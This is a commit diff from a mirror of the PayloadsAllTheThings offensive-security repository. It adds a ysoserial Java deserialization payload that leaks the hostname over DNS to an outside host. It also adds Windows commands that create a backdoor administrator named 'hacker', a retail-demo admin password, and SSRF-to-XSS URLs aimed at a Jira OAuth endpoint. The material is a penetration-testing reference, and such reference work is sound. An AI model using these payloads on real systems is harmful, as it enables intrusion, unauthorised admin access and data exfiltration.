Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

SSRF to XSS + Retail account Windows

Browse source
This commit is contained in:
Swissky 2018-06-06 00:05:28 +02:00
parent 8eb6cb80f9
commit 4ad7c70e89
3 changed files with 21 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
Java Deserialization/README.md
View file

@ -6,6 +6,7 @@
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
```
payload | author | dependencies | impact (if not RCE)

10
Methodology and Resources/Windows - Using credentials.md
View file

@ -1,5 +1,6 @@
# Windows - Using credentials
Little tip, if you don't have credentials yet :D
## TIP 1 - Create your credential :D
```powershell
net user hacker hacker /add
net localgroup administrators hacker /add
@ -10,6 +11,13 @@ net user /dom
net user /domain
```
## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
```powershell
Username: RetailAdmin
Password: trs10
```
## Metasploit - SMB
```c

11
SSRF injection/README.md
View file

@ -194,6 +194,15 @@ Content of evil.com/redirect.php:
?>
```
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
```bash
http://brutelogic.com.br/poc.svg -> simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
```
## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at http://169.254.169.254
@ -335,3 +344,5 @@ http://100.100.100.200/latest/meta-data/image-id
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)